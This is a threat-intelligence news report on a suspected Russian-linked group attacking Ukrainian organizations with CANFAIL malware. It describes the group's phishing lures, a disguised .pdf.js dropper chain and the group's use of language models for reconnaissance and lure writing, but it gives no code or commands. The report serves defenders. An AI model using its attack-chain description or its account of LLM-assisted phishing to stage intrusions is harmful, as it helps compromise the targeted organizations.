Emerging Russian-Linked Cyber Threat Targets Ukrainian Organizations with CANFAIL Malware
A newly identified cyber threat actor, potentially connected to Russian intelligence services, has been implicated in a series of attacks against Ukrainian entities using a malware strain dubbed CANFAIL. The Google Threat Intelligence Group (GTIG) has observed this actor targeting sectors such as defense, military, government, and energy within Ukraine’s regional and national frameworks.
Beyond these primary targets, the group has shown an expanding interest in aerospace organizations, manufacturing firms associated with military and drone technologies, nuclear and chemical research institutions, and international bodies involved in conflict monitoring and humanitarian aid in Ukraine.
Despite possessing fewer resources and exhibiting less sophistication compared to other Russian-affiliated threat groups, this actor has recently begun leveraging large language models (LLMs) to enhance their operations. By utilizing LLMs, they conduct reconnaissance, craft social engineering lures, and seek technical guidance for post-compromise activities and command-and-control (C2) infrastructure development.
Recent phishing campaigns orchestrated by this group involve impersonating legitimate Ukrainian energy organizations to gain unauthorized access to both organizational and personal email accounts. They have also masqueraded as a Romanian energy company with Ukrainian clientele, targeting Romanian firms and conducting reconnaissance on Moldovan organizations.
To facilitate these operations, the threat actor compiles email address lists tailored to specific regions and industries. Their attack vectors often include LLM-generated lures embedded with Google Drive links leading to RAR archives containing the CANFAIL malware.
CANFAIL is an obfuscated JavaScript malware typically disguised with a double extension (e.g., .pdf.js) to appear as a PDF document. Once executed, it runs a PowerShell script that downloads and executes a memory-only PowerShell dropper, all while displaying a fake error message to the victim.
GTIG has also linked this threat actor to a campaign known as PhantomCaptcha, disclosed by SentinelOne’s SentinelLABS in October 2025. This campaign targeted organizations associated with Ukraine’s war relief efforts through phishing emails directing recipients to counterfeit pages hosting ClickFix-style instructions, initiating the infection sequence and delivering a WebSocket-based trojan.
